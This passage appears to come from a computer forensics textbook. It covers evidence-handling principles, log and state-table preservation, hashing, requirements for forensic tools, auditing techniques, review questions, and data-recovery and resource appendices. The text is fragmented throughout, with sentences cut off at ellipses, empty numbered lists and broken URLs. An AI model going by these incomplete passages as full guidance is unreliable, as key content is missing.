and to determine if there is employee collaboration in fraudulent claims
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...
, “Encryption Wars: Early Battles” (© 2000
IEEE), IEEE Spectrum, 445 Hoes Lane, Piscataway, New Jersey 08855,
2001
...
, i-mode Crash Course, McGraw-Hill, New York, 2002
...
, Electronic Commerce, 3rd ed
...

[5] Vacca, John R
...

[6] Vacca, John R
...


This page intentionally left blank

21

Summary, Conclusions,
and Recommendations

omputer forensics may sound like a media-generated catchphrase, but its
principle is actually quite simple
...
Computer forensics applies those same principles to digital evidence recovery
...
To help create cooperation
between the United States and other nations, the G8 group (http://www
...
org/)
of major industrialized nations has proposed six principles for procedures relating
to digital evidence, which it defines as information stored or transmitted in binary
form that may be relied on in court:

C

1
...

2
...

3
...

4
...

5
...

6
...

All computer forensic policy and procedures should be developed from these
principles
...
Perpetrators range from 13-year-olds to trained experts paid by
rogue nations to infiltrate and steal proprietary information; organization insiders
could also perpetrate similar crimes
...
If a network manager
discovers contraband (illegal or illegally acquired equipment), he or she should simply
turn the matter over to law enforcement
...
Within network-related crimes, “innocent” computers are often used as instrumentalities—they are used to commit further crime, either denial of service attacks or by providing a pass through for the criminal
...

Computers classified as mere evidence are usually not seized
...
Before getting into specifics on how this is done, let us first examine some policies that should be in place before the need for forensics arises
...

When formulating all policies regarding computer forensics, a balance must be
struck between expediency and following a proper chain of command
...
Each organization needs to decide how far to proceed up the hierarchy
when responding to different levels of attacks
...
A recent study performed jointly by the Computer
Securities Institute (CSI) and the National Infrastructure Protection Center arm of
the FBI found that a significant number of attacks (84%) came from disgruntled employees
...


Summary, Conclusions, and Recommendations

675

When dealing with internal policies, desktop examination is a crucial element,
whether the matter is simple misuse or corporate espionage
...

Certain laws exist to provide some privacy to the end user [3]
...
The law contains certain provisions that should be incorporated into every policy
...
Policy rules regarding an open Internet service provider (wherein anyone
can pay and join) are significantly more stringent
...

Law enforcement commonly refers to Title 18 USC 2703(f) as sending an “Fletter” (referencing that the law is section F of the statute) to a provider
...
A
company should immediately take the steps mandated via the phone call, without
waiting for the letter’s arrival
...
There should be appropriate policies in place to handle this possibility,
from the administrative receiving end all the way to placement of the backed-up
records
...

How does a manager know if the staff possesses the requisite knowledge to
create sound corporate policies on evidence recovery? This is an extremely difficult
question to answer, but one approach might be to determine who, typically, would
not be qualified
...
A dedicated network security specialist may or may not have the
appropriate knowledge, but this is probably the best place to start looking
...


676

Computer Forensics, Second Edition

Mapping the Labyrinth
Even though the corporate computer forensics specialist is not a law enforcement
officer, he or she will still find merit in following the same forensic procedures
...
From the moment a computer
is recognized as compromised, documenting should begin
...
Documentation should include the
basic “who, what, when, and where” criteria and how long each individual spent diagnosing and repairing any problems, which is used to determine damages
...
S
...

It is essential for companies to keep track of their damages when responding to
an intrusion threat for purposes of criminal prosecution
...
Thus, companies
are asked to keep track of their costs so that intruders can be effectively prosecuted
...
Afterward, the hard
drive is usually removed and reinstalled on another machine
...

What imaging software you choose to use is largely a personal preference, provided that it satisfies the criterion of providing complete bit-by-bit imaging
...
Some popular choices (although this author and publisher are not endorsing any) are Safeback (http://www
...
com
/safeback
...
digitalintel
...
encase

...
html)
...
It may be an option
...
This is done by proper hash
testing, discussed later on
...
There are several options and opinions within the field regarding how best to handle a Unix box
...
Regardless, the first step is, as always, to document the state of the system before touching it
...

The next step is to collect any possible evidence from RAM, accomplished by using
the command line “ps -aux” or “ps -ef,” depending on the Unix version
...
If any are found, the associated RAM contents should be saved
...
A computer forensics specialist should also be familiar with
programs such as List Open Files, beneficial in isolating trouble spots
...

After RAM documentation, there are several options: one is to sync, halt, reboot, and mount the drives from a CD
...
This procedure also changes
the state of the hard drive, which is a possible concern
...
Afterward, the drive can be
mounted dirty, and bit-stream copies can be created from the original
...
This is not a command that can be covered briefly, as it has many
options and parameters, such as identifying a data-definition element in a definition list and converting a file while copying it
...

Truth Serum
No matter what operating system (or program used to create copies) is being utilized, some type of verification software should be part of the forensics equation
...
This is accomplished by using
mathematical algorithms, called “hash functions,” which calculate hash values
(also known as checksums, or fingerprints) based on the original file or image
...


678

Computer Forensics, Second Edition

A file-hashing utility should always be used to verify the copying of all files or
images
...
The hash values should
be recorded and kept in order, along with such data as when the program was run,
who ran it, and what program was used—valuable information for the event reconstruction typical of court cases
...
What logs an
organization chooses to keep, and how long it will keep them, largely depends on
available space and average number of entries received
...
Although such probes are annoyances that are not even necessarily illegal, it may be important to keep logs of them
...

To keep logs from being destroyed by malicious intrusions, system operators
will often output some logs to a printer or a CD-ROM device; this can be an expensive route, but it frequently offers greater security
...

Different versions of Unix have their logs in different areas
...

One of the primary logs used in computer forensics is syslog, the main system
log containing a variety of important messages
...
In addition, routers and firewalls
can be configured to add messages to the syslog
...

Some popular logs that may prove useful include acct, aculog, lastlog, loginlog, sulog, utmp(x), wtmp(x), void
...
Remember that when any of
these logs are copied, a hashing program should be used to ensure proper backup
creation
...
evt, secevent
...
evt—
are kept in the percentsystemroot percent\system32\config directory and are normally
viewed using Microsoft’s built-in Event Viewer
...
It is important to have a current list
of programs and services installed and to have a checklist for log preservation
...
State tables show actions that
take place either in real time or in the immediate past
...
The Netstat command displays network connections, routing tables, interface statistics, masquerade connections,
netlink messages, and multicast memberships
...
MAC addresses do not cross routers
...
If
the router is keeping the correct logs, and a packet has only traveled over a few
routers, this information may be useful
...

There are special steps for state table preservation
...
The log
should then be hashed and preserved with other evidence
...
These files should be hashed along with the original
...
More important still is the method by
which those media are handled
...
Obviously, care must also be taken to
protect the media from various environmental elements: preferably, it should be
placed in an appropriate container, taped shut, then initialed and dated
...
Some type of standard
tracking method should be used with every piece of evidence
...
There are two types of costs: the cost of doing nothing
about data-evidence recovery and the cost of doing something about it
...


680

Computer Forensics, Second Edition

Personnel costs associated with computer forensics are dependent on several
factors, including the number of different operating systems the person is expected
to know
...
Costs are
fluid and should be taken only as ballpark figures
...
Costs for materials examination may
run from $40 to $700 for one case
...
It is possible, of course, to hire an outside forensics
specialist
...

There is a wide range of options when it comes to the software
...
There are also costs for password cracking, both for software and the time necessary on a computer (cost per CPU cycle)
...
Tracking all of these costs is extremely helpful if any court proceedings occur
...
Every organization
should consider forming a computer security incident response team (CSIRT, sometimes referred to as a Computer Emergency Response Team, or CERT), if one hasn’t
already been established
...
This can
help create a safer environment for an organization’s employees, customers, and
business partners
...
For the IT manager, that means the server
room, where the Internet has brought not only the promise of a worldwide audience but also the threat of worms, hackers, and cyberterrorism
...

In the same week that the terrorist destruction of the World Trade Center took
place, the Nimda worm ran rampant through the Internet
...


Summary, Conclusions, and Recommendations

681

Much of enterprise IT security has been built around firewalls or monitoring
products meant to keep the bad guys out
...

The role of computer forensics in the current rush to security cannot be overstated
...
Developing systems that have what appears to be
an effective front end, but in reality are porous, is at least partly to blame for the lax
airport security programs that had such a horrific result and still do
...
Too
much data is often more dangerous than too little, as overwhelming data can give
you a false sense of security
...
The war on terror will be marked by huge amounts of data,
gathered electronically and in person, that will be analyzed to focus on a small
group of fanatics
...
The IT sector through computer forensics has a crucial role to play in stopping the terrorists before they can strike again
...
Government officials estimate that only
20% of such incidents are reported because individual agencies either don’t have
the technical sophistication to discover the crimes or want to keep bad news quiet
...

Computer compromises are a serious issue
...
In addition, there’s an ingrained reluctance on the
part of agencies to work together to combat computer crimes
...

During the first three months of 2004, the Federal Computer Incident Response Center (FedCIRC), the government’s central crime data repository,

682

Computer Forensics, Second Edition

recorded 88 root compromises at civilian nondefense federal agencies, which put it
on pace to exceed the 2003 total
...

A root compromise occurs when an intruder gains systems administration privileges on a network, giving the attacker the ability to do things such as copy documents, alter data, or plant malicious code
...
uscert
...
FedCIRC doesn’t know whether they’re seeing a change in
the rate of reporting, the rate of detection, or the rate of penetration
...
Agencies are already required by
law to report breaches to FedCIRC as a result of the Government Security Reform
Act approved in 2000
...
The 9-11 attacks and the recent issuance of educational visas to the dead terrorists have borne that out
...
For example, it said in a
report recently released that it found significant security weaknesses at all of the 24
agencies where it conducted audits of IT security readiness
...

Cost of Computer Crime Exploding
According to results of the 2004 Computer Crime and Security Survey [3a] recently released, intellectual property theft and security breaches are on the rise and
the costs of those intrusions are skyrocketing
...

The survey also shows that the cost of that theft is exploding
...
The amount is up from almost $101 million in 2003 and $64 million in 2000
...
That means
theft of intellectual property accounts for 44% of all losses tabulated in the survey,
despite the fact that such a small number of companies could quantify it
...
The problem is that many companies
aren’t aware that they should be protecting the information that fuels their businesses—such as marketing plans, source codes, and research information
...

Industrial espionage is giving way to information age espionage
...

You bribed them
...
But why risk someone getting caught
when you can just hack in and take what you need? The survey also points to several other aspects of computer security that are on the rise:
Forty-four percent of respondents reported outside system penetration
...

Forty-two percent detected denial-of-service attacks
...

In 2004, 683 people were able (and willing) to quantify financial losses
...

Forty percent of respondents reported security breaches to law enforcement
agencies
...

Industry analysts and corporate users agree that more administrators should be
focused on protecting their valuable proprietary information
...
What they’re not doing is protecting their own information,
records, plans, and technologies
...
It’s not that upper management doubts the information’s
value, but rather that upper management feels that there isn’t enough threat to warrant any significant attention
...

Companies developing a new drug or a new widget may understand how sensitive that product information is, but they find it hard to protect
...
It’s difficult to enforce protection of information while still letting people at the information
...
It’s clearly a dangerous world, and will continue so for years to come—possibly even get worse—given the widespread deployment of computer forensics and security technologies
...


684

Computer Forensics, Second Edition

RECOMMENDATIONS
Details of the arrest of U
...
Federal Bureau of Investigation Special Agent Robert P
...
The
FBI conducted a search of Mr
...

Hanssen wrote to his Russian handlers in 2000
...

Few of us will ever be in as tense a situation as the one the FBI faced recently with
Mr
...
Mess that up from an evidence-handling perspective and a major international
espionage case could evaporate, but no matter where you work in the computer security field, you may one day find yourself faced with a tough investigative challenge—looking for the right tools to accomplish an incredibly important job, facing
near impossible deadlines—and always with the thought in the back of your mind
that if you mess something up, life as you know it could change drastically
...
Computers being what they are, it takes a
computer and a robust set of applications to analyze another computer in such a
manner that the results of the analysis are thorough, sound, unbiased, and repeatable
...
Each developer has his or her own unique perspective on the
needs of the investigative community and his or her own approach as to how to
meet those needs, but few have started the software-development process with a
well-stated computer forensic analysis requirements document
...
The knowledge, skills, and experience of the analyst at the keyboard can also play a significant role in the performance of a tool when no thorough requirements document exists
...
Let’s
start with a requirements definition
...
With luck, where tools fall short of meeting requirements,

Summary, Conclusions, and Recommendations

685

developers will take the results to their labs and work to improve the tools
...

Requirements Definition
Let’s begin this look at requirements by identifying certain capabilities that a forensic examiner needs, based on tasks the examiner must perform to complete a thorough, unbiased, and forensically sound examination of computer media
...
It is also not intended to mandate that any specific software
tool be used in any specific set of circumstances
...

This requirements definition also takes into account that law enforcement officers have different requirements than corporate security and investigations personnel
...
Corporate security and investigations personnel do typically have some
authority to preview systems, determine which ones may have relevant evidence,
and preserve evidentiary images of systems deemed to contain relevant evidence
...

At a fairly fundamental level, the forensic analysis toolbox needs certain capabilities
...
That requirement exists because certain data in the logical file system may not be readily available or readable at the physical level
...
exe
...
pdf) files are, likewise,
physically written to disk in a manner that obscures the textual content of the document
...

A search of computer media at the physical level also might miss plain text
words in a document if the document is fragmented physically on disk and the
word of interest is partially contained at the end of one sector and the beginning of
a noncontiguous sector
...

This requirements definition also sets forth minimum requirements for functionality, taking into account a wide variety of technical, logistical, and legal circumstances
...
An investigator at a crime scene must be able to identify computer
systems or media possibly containing digital evidence relevant to the case
...
Any evidence on the media is possibly lost
...
After preserving the evidence, an investigator will conduct series of examinations (analyze) of the data on the media to extract relevant
information from it
...

The capabilities an examiner requires for any one step of the process may
sometimes overlap with capabilities required for other steps
...
The following capabilities are useful as
a starting point to develop a set of minimum requirements:
An investigator requires a capability to simultaneously preview a large number
of systems on site to determine which ones contain relevant evidence
...

The search tool must be able to reliably report the physical location on the
media where responsive data were found
...

An investigator requires an ability to generate a listing of all logical files in a file
system
...


Summary, Conclusions, and Recommendations

687

An investigator requires an ability to identify and process special files
...

Investigators require the capability to make forensically sound images of a wide
variety of media
...

Investigators require the capability to perform a sector-by-sector comparison
of two pieces of media to determine where they differ
...


Simultaneously Preview a Large Number of Systems on Site

In some situations, identifying which computers or media at a scene may contain
information or data of evidentiary value is fairly straightforward
...
In other
cases, particularly where the allegation concerns activities of insiders, it may not be
so easy to determine which systems contain information of evidentiary value
...

In most cases, an initial search at the physical level of the media may be sufficient to determine if a specific computer system or piece of media contains relevant information and should be imaged or preserved for further, more detailed
analysis
...
The investigator must decide, based on the circumstances of
the case, whether a fruitless search at the physical level of the media is sufficient to
exclude the media from further processing
...

Validated Read-Only Methodology

For previewing media on scene, an investigator requires a capability to preview
media using tools and methodologies that have been tested under various circumstances and validated not to make changes to the original media
...
Unintentionally
modifying date/time stamps in particular could unnecessarily complicate the
evidence-analysis process
...
Whether the preview process will be done via a remote connection to a computer system or will be executed locally on the system, the investigator must know exactly what the boot process is, ensure that the boot process used
does not make changes to any of the data on the media to be previewed, and ensure
that the preview tools and methodologies are forensically sound
...
A local preview of media involves using a controlled boot process
to boot the suspect machine and conduct a review of the system locally
...

Like a local preview, a remote preview must be conducted in such a manner
that it does not make changes to the media being previewed
...
Using a remote preview capability may limit the number of simultaneous iterations that can be conducted because it requires more hardware, but in
cases where only a few systems need to be previewed, a remote capability could be
very useful
...
No matter the exact
mechanism used, the preview process must be forensically sound and must not
make changes to the media being previewed
...
The
search tool must have the ability to use both ASCII and UNICODE character sets
...
Other operating systems can use the UNICODE
character set as well as the ASCII character set
...
Preferably, a single pass through the media will search using
both character sets simultaneously
...

If the tool cannot see and search all sectors of the media, the resultant search may
not be thorough enough to establish that evidence either does or does not reside on
the media
...
Tools that require separate passes through the media to search for each keyword would unnecessarily
constrain the investigator in terms of both time and efficiency, especially when
searching one of today’s 80-Gb and larger hard drives
...
Some file type
headers and all binary files will contain nonprintable ASCII characters
...

Report the Physical Location on the Media

This report could use either the cylinder-head-sector (CHS) or logical block addressing (LBA) address of the responsive data
...

The search tool must be able to show results in context
...
The investigator must be able
to discern the context within which a word or phrase resides on the media to determine whether the context is relevant to the investigation
...
Otherwise, the investigator must use a hex editor to preview each sector
containing the key word to determine whether it actually contains relevant data
...
The hash process must take into account every bit of every byte of every sector on the media, from sector 0 to the last physical sector, regardless of whether any
specific sector is included in any logical volume on the media
...
For
hard drives, the 128-bit message digest 5 (MD5) algorithm is preferred
...
If an investigator

690

Computer Forensics, Second Edition

begins with a logical search to preview media, and that search produces no relevant
results, the investigator may have to follow up with a search of the physical media
to ensure a thorough search
...
For instance, a hard
drive may be partitioned and formatted to boot multiple operating systems, each
using a different file system
...

As with the physical level search, the search tool must have the ability to use
both ASCII and UNICODE character sets
...

The search tool must be capable of searching all sectors within the logical
boundaries of the file system
...
For reasons already stated, the
search tool must be able to use a keyword list
...
The tool that creates this list
must be able to write the list of files to appropriate media, whether that is a networkaccessible volume, a local hard drive not under investigation, or some appropriate
removable media connected to the analysis machine
...

In addition, an investigator requires an ability to generate a listing of all the
date/time stamps an operating system may store in relation to each file in the file
system
...
Those dates/times may include Date/Time Last Modified,
Date/Time Last Accessed, or Date/Time Created
...

Furthermore, an investigator requires the ability to identify and generate a listing of all deleted files in the file system
...


Summary, Conclusions, and Recommendations

691

Search the Contents of the Regular Files

Searching the contents of the regular files is a particularly important requirement
for the search tool
...
Some search tools that operate at the logical level of the media do not quite
meet this requirement, because most operating systems keep a Date/Time Last Accessed time stamp and will attempt to update this stamp when the search tool opens
or closes the file
...
If a search tool allows the operating
system to update Date/Time Last Accessed when the tool runs, then the investigator
must take steps to preserve those date/time stamps prior to using the search tool
...
In most cases, the minimum standard at a file
level is the CRC algorithm, but for very large files, the MD5 algorithm is preferred
...
Special files include encrypted, compressed, or password-protected files; steganographic carrier
files; graphics, video, and audio files; format files; executable files or binary data
files; files housing email archives or active email content; swap files or virtual memory files; and other such file formats that obscure their plain text content
...
Other types of special files, such as encryption or steganography, may require a more dedicated effort to bypass the security mechanisms
...
This would also include identifying and searching all free
(unallocated) space, identifying relevant file headers in free space, identifying
deleted directories in free space, including directory entries for deleted files, and recovering deleted directory entries as well as all pertinent deleted files that are not
overwritten
...
The criteria for forensically sound media images is fairly straightforward: the image must include a true,
validated copy of every bit of every byte contained on the media, without regard to
media contents, from the absolute beginning of the media to the end of the physical device
...
In today’s world of smart cards
and “computer memory cards,” where cameras can store hundreds of pictures on
memory cards (where these cards can supply memory to portable or handheld devices), the variety of media investigators are faced with is ever-widening
...
New imaging and analysis tools must keep apace
...
This requirement stems from a need to be able to run applications installed on drives that have been preserved as evidence
...
Today’s large applications rely on installation processes that do more
than just copy the application files to the media, so running the application in its
installed environment may be necessary
...

Perform a Sector-by-Sector Comparison

To verify that one piece of media is an identical copy of another, investigators typically use media hashes of some type
...
In most cases, simply knowing that two pieces of media have
different hashes will not give you an indication of where on the media the difference
occurs
...
This tool could verify
that any differences between the original and the copy are merely sectors filled with
hashes and are accounted for by geometry differences only
...
If the software is self-documenting and certain
reports are automatically generated for the user, based on the results of exercising
the capabilities of the software, this could help make reporting results much simpler
...
This next part of the chapter recommends the establishment of computer forensics standards for the exchange of
digital evidence between sovereign nations and is intended to elicit constructive
discussion regarding digital evidence
...
As a result, the world changed from analog to digital
...
An entire constellation of audio, video, communications,
and photographic devices are becoming so closely associated with the computer as
to have converged with it
...
The connectivity resulting from a single world economy in which the companies providing goods and services are truly international has enabled criminals to
act transjurisdictionally with ease
...

This situation requires that all nations have the ability to collect and preserve
digital evidence for their own needs as well as for the potential needs of other sovereigns
...

Although it is not reasonable to expect all nations to know about and abide by
the precise laws and rules of other countries, a means that will allow the exchange
of evidence must be found
...

Standards

To ensure that digital evidence is collected, preserved, examined, and transferred in
a manner that safeguards the accuracy and reliability of the evidence, law enforcement and forensic organizations must establish and maintain an effective quality

694

Computer Forensics, Second Edition

system
...

Standards and Criteria

All agencies and organizations that seize or examine digital evidence must maintain
an appropriate SOP document
...

The use of SOPs is fundamental to both law enforcement and forensic science
...
The development and implementation of these SOPs must be under an organization’s management authority
...
Rapid technological changes are the hallmark of
digital evidence, with the types, formats, and methods for seizing and examining
digital evidence changing quickly
...

Procedures used must be generally accepted in the field or supported by data
gathered and recorded in a scientific manner
...
The validity of a procedure may be
established by demonstrating the accuracy and reliability of specific techniques
...

The organization must maintain written copies of appropriate technical procedures
...

Required elements such as hardware and software must be listed, and the proper
steps for successful use should be listed or discussed
...
Personnel who use these procedures must be familiar with them and have them available for reference
...
Although many acceptable procedures may be used to perform a task, considerable variation among cases requires
that personnel have the flexibility to exercise judgment in selecting a method appropriate to the problem
...
Software

Summary, Conclusions, and Recommendations

695

must be tested to ensure that it produces reliable results for use in seizure and
examination
...
In
general, documentation to support conclusions must be such that, in the absence
of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator
...
Chain-of-custody documentation must be maintained for all digital evidence
...

Handwritten notes and observations must be in ink, not pencil, although pencil (including color) may be appropriate for diagrams or making tracings
...
Notes and records should be authenticated
by handwritten signatures, initials, digital signatures, or other marking systems
...
As discussed in the preceding standards and criteria, evidence has value
only if it can be shown to be accurate, reliable, and controlled
...

Finally, now that the establishment of computer forensics standards has been
made, it is time to recommend some auditing techniques
...

Computer Forensics Auditing Techniques
Companies that believe their networks and the Internet can be completely protected by a phalanx of add-on computer forensics and security products may be in
for a rude awakening
...

Computer forensics and security-auditing companies can give a company expert analysis of obscure but potentially devastating loopholes, along with estimates
of cost versus risk for each of many possible approaches to address them—and a
basis for deciding whether spending a little more money up front will save much
more in the long run
...


696

Computer Forensics, Second Edition

How to Audit Your Network and Internet Security Policies with Computer Forensics
Techniques

The Internet has allowed businesses to communicate in new and strategic ways
with various types of people and organizations
...
Instead, they have to fight for the resources to secure it
...

The Internet Octopus

Over the years, you have added feature upon feature to your Internet and network
connections
...
In the beginning, services such as simple POP3-style email and Web access were the extent of
an Internet connection
...
During all these changes in the past few years, you have probably changed IT personnel, Internet platforms, and network connections at least
once
...

Any network connection to the Internet is vulnerable to exploitation
...
Today, you are finding more intelligent defenses against attacks, such as denial-of-service attacks, as
routers and other devices can be set to verify source addresses and ignore packets if
they are bogus or carry a suspicious pattern
...

Many organizations have grown their Internet set of features across multiple
devices or possibly multiple network connections—a firewall for Web and email
traffic, a VPN appliance for remote connections, a different firewall for a businessto-business relationship, or other possible combinations of lines and devices that
can push Internet vulnerabilities beyond control
...
Regardless of the number of devices that are on the Internet, each has
different services that can be potentially exploited
...


Summary, Conclusions, and Recommendations

697

What You Can Do

There are a number of things you can do to keep your network connections secure
and to keep business running as usual
...

Check for any manufacturer or service provider default passwords that may be
easily known or guessed
...

Beware of potential internal threats
...

After this basic housekeeping is completed, it’s important to perform a “vulnerability chain assessment” with your computer forensics tools on your own
...

A vulnerability chain assessment tells administrators what is affected by what and
who potential perpetrators could be
...
For each item, consider the potential vulnerabilities that could cause an interruption of service:
Internet (outside of your router): Internet being unavailable from your carrier
or region, phone line cut, denial of service, and so on
...

Internet router: ISP configuration may have well-known default passwords;
this could reroute all incoming mail, shut down an interface, or adversely affect
performance by some other means
...

VPN appliance and firewall: Security compromise, stale VPN accounts or vendor
default account, unwanted services, failure of device, and so on
...


Obtain Peace of Mind

One thing you can do to bring some validity to your efforts is to get an external opinion of your Internet and network security
...

A third-party piece of computer forensic auditing software or original equipment
manufacturer (OEM-provided) tool to examine security issues
...

The professional hacker approach is recommended, but you have to be careful
...
You want a professional hacker to do more than call vendors asking for passwords and back-door methods
...
These third-party computer forensic examinations can yield beneficial information to solidify a security strategy
...
It’s a wonderful feeling to present management with a report saying that this
external group is impressed with the security of your Internet presence
...
You
can also find Web sites that host information on how to exploit specific products
...

There are countless free or time-trial pieces of computer forensics auditing
software you can use to peek at your connection, but be careful
...

One of the things that is also very important is your ability to distribute risk
...
However, the better you distribute risk, the more expensive things become
...

Have an alternate Internet connection
...

Put up a honeypot to attract or distract would-be hackers
...
company
...


Summary, Conclusions, and Recommendations

699

Proactively renew or cancel your Internet service provider agreement before it
expires or before the carrier contacts you
...

With a bit of diligence, you can keep your Internet and network security at
peak, which will protect the business goals of the organization
...


FINAL WORD: COMPUTER FORENSIC NEEDS AND CHALLENGES
Reporting of economic and cyber crime is problematic and grossly underestimated,
as is apparent from the many risks associated with corporations’ reporting or sharing fraud losses and activity
...

The Fraud Identification Codes established by the National Fraud Center are a
start
...
Uniform and thorough reporting is necessary in the war on economic and
cyber crime; resources for computer forensics investigation and prosecution will
naturally follow as the enormity of the problem unfolds
...
Academics have not been able to agree on definitions and have, for the
most part, continued to focus on white-collar crime
...
To this day, the true nature of the amount of economic crime is buried in the statistics of more conventional crimes
...

Preventing, detecting, investigating, and prosecuting economic crimes must
become a priority in order to lessen their impact on the economy and the public’s
confidence
...
New resources, support for existing organizations (the National Fraud Center, the National White Collar Crime Center, the
IFC, and the Economic Crime Investigation Institute), and innovative computer
forensics solutions are needed to control this growing problem in the United States
and the world
...
All stakeholders
must be more willing to exchange information on the effect economic and cyber
crime has on them and the methods they are using to detect and prevent it
...

In fact, industry has more resources than government, but it must be motivated
and authorized to partner and communicate
...
The victims need to follow the lead of the criminals and organize
themselves, so that the organized bad guys are not operating in a lawless environment, where culpability is at a minimum
...
Current and future administrations must
recognize the full impact of economic and cyber crime, both domestically and globally, and make a concerted, strategic effort to combat it, for the benefit of all society
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? When dealing with digital evidence, all the standard forensic and
procedural principles must not be applied
...
True or False? Upon seizing digital evidence, actions taken should not change
that evidence
...
True or False? People who access original digital evidence should not be trained
for the purpose
...
True or False? All activity relating to the seizure, access, storage, or transfer of
digital evidence must be fully documented, preserved, and available for review
...
True or False? Individuals are responsible for all actions taken with respect to
digital evidence while such evidence is in their possession
...
To help create cooperation between the United States and other nations, the G8
group of major industrialized nations has proposed six principles for procedures
relating to digital evidence, which it defines as information stored or transmitted in
binary form that may be relied on in court:

Summary, Conclusions, and Recommendations

701

A
...

B
...

C
...

D
...

E
...

2
...
An investigator requires a capability to simultaneously preview a large number of systems on site to determine which ones contain relevant evidence
...
An investigator requires the capability to conduct a search at the physical
level of the target media, ignoring operating system and file system logical
structures, and searching from sector 0 to the end of the media regardless
of the logical content
...
The search tool must be able to unreliably report the physical location on
the media where responsive data were found
...
An investigator requires the capability to conduct a thorough, read-only
search at the logical level of the target media
...
An investigator requires an ability to generate a listing of all logical files in
a file system
...
There are a number of things you can do to keep your network connections
secure and to keep business running as usual
...
Verify that there are no accounts for terminated employees
...
Check for any manufacturer or service provider default passwords that
may be easily known or guessed
...
Verify that any temporary services or open ports are disabled
...
Beware of potential external threats
...
Have the mindset of “deny all except that which is explicitly stated in the
rule set
...
All the items listed below have vulnerabilities—some of which are beyond your
control
...
Internet (outside of your router)
B
...
Internet router
D
...
VPN appliance and IDS
5
...
You can obtain this opinion via
the following, except:
A
...

B
...

C
...

D
...

Exercise
When a leading United States–based drug manufacturer’s financial audit team received a tip that certain employees were suspected of performing fraudulent actions, they responded immediately by launching a full-scale investigation
...
First, the fraudulent activity was
occurring on the other side of globe at the company’s Middle East office
...
Traditionally,
an effective investigation would require the investigation staff to travel to the remote location
...
In addition to fraud having a potentially serious impact on a company’s bottom line, Sarbanes-Oxley mandates that public companies have a diligent, internal fraud investigation capability
...
This required the
diligent and thorough investigation of all relevant Middle East–based computer
activity, which could not be performed by local IT staff, as they were potential suspects
...
How was the
CFST able to go about conducting their investigations?

Summary, Conclusions, and Recommendations

703

REFERENCES
[1] Vacca, John R
...

[2] Gottfried, Grant, “Emerging Technology: Taking a Byte Out of Crime,”
National Center for Forensic Science (NCFS), Orlando, FL, 2002
...
, Net Privacy: A Guide to Developing & Implementing an Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...

[4] Vacca, John R
...
, Charles River Media, Hingham, MA, 2001
...


WHY COMPUTER FORENSICS?
The vast majority of documents now exist in electronic form
...
Computer forensics
ensures the preservation and authentication of computer data, which is fragile by
its nature and can be easily altered, erased, or subject to claims of tampering without proper handling
...


WHAT IS DATA RECOVERY?
Data recovery is the process of retrieving deleted or inaccessible data from failed
electronic storage media such as computer hard disk drives, removable media, optical
devices, and tape cartridges
...
Regardless of the cause of your data loss, your experienced technicians
should be able to successfully recover lost data 80 to 85% of the time
...

Expedited Data Recovery

If you should need this service, you need a dedicated technician assigned to your
drive within 4 hours of the time that you send in your hard disk
...

Emergency Data Recovery

If your situation is critical, you will need to make arrangements for a technician to be
available who will be assigned to work on your recovery until it is completed
...
However, because
of the complexity of data recovery, there will be times when it will take longer
...
There are instances when the damage to the hard drive is so severe that data recovery is not possible
...

However, in a number of cases, data recovery was possible at the time the damage first occurred, but the data became nonrecoverable through the use of commercial recovery software
...
If your drive has experienced a mechanical or electrical failure, the use of recovery software can cause permanent loss of your data
...

Although your hard drive has many electronic components, it also has moving
parts
...

Avoid Heat and Vibration

All drive components, both electronic and mechanical, are sensitive to heat and vibration
...
Set up your computer in an area with little traffic to ensure that it does
not get bumped
...
Also, beware of static
...
If you don’t have a tape backup device or network drive at your fingertips,
back up your most important files to a floppy disk at least once a week
...
Run it every two or three weeks just to be safe
...

Run Defrag Frequently

Files will most likely not be stored in adjacent clusters
...
This is
essential for data recovery because success is more likely when the damaged file’s
clusters are adjacent to each other
...
Also, use an uninterrupted power supply (UPS)
...
A UPS is also a backup power source that keeps your computer running for a
short period of time, giving you the opportunity to properly save your work and
shut down, avoiding a potential data loss
...
Verify that your utility software is
compatible with your operating software
...
Always make an undo disk when
you allow a utility to make changes to your hard drive
...
Only your drive is required for data recovery
...
If an antistatic bag is not available, a
freezer bag will suffice
...
If this is not possible, pack the hard drive in a sturdy

708

Computer Forensics, Second Edition

corrugated cardboard box twice the size of the drive, with heavy foam padding,
bubble wrap, or other antivibration materials
...
Be sure the padding material is at least two inches
thick around the drive
...
Enclose the drive
along with a damp sponge in a sealed plastic bag to prevent it from drying out
...
Remove the controller carefully, enclose in it antistatic material, and ship it along with the drive
...

Locations
Ship the drive directly to the recovery facility nearest you: It is recommended that
you ship via UPS or Federal Express domestically and DHL internationally, using
next-day service
...
Also, if you have any special shipping considerations, questions,
or concerns, please contact your overnight carrier
...
When your data is recovered and your drive is not repairable, there are many different ways to return your data, including a new drive,
magnetic tapes, Zip cartridges, or CD-ROM
...
They are offered as resources that other systems security and forensics professionals have found helpful
...
accessdata
...
AccessData’s site offers information
about this and other security-related tools, and you will find several free tools here
...

Digital Intelligence, Inc
...
digitalintelligence
...

They also offer free forensic utility software for law enforcement
...
net/)

This site is full of network security and information warfare articles and white papers
...


709

710

Computer Forensics, Second Edition

Guidance Software (http://www
...
com/)

Guidance is the creator of the popular GUI-based forensic tool EnCase
...

High Tech Crime Investigation Association (http://htcia
...

International Association of Computer Investigative Specialists (http://cops
...

Mares and Company, LLC (http://www
...
com/)

Mares has been authoring computer forensic tools for law enforcement for many
years
...
Information regarding Mares’ computer forensic training can also be found on this site
...
forensics-intl
...
There are also many good articles concerning
technical and legal issues surrounding computer forensics
...
org (http://www
...
org/wietse/)

This site is provided by Wietse Zweitze Venema, which provides tools and white
papers focused primarily on postmortem analysis of computer break-ins
...
(http://www
...
com/)

Sydex can take hundreds of different floppy and tape types and convert them to
Windows-readable files
...
They can also repair diskette data errors and perform
forensic analysis
...

The Coroner’s Toolkit (http://www
...
com/tct/)

The Coroner’s Toolkit is a collection of tools that are oriented toward either gathering or analyzing forensic data on a Unix system
...
tucofs
...
htm)

The TUCOFS Web site is a great collection of computer forensics resources and tools
...
(http://www
...
com/)

The sole purpose of this site is for information warfare and computer security
...
(http://www
...
com/page/page/1097778
...
This
site includes some excellent technical papers concerning advancing crime scene
computer forensics, timelining computer evidence, and using smart cards and digital signatures to preserve electronic evidence
...
cdt
...
With expertise in law, technology, and
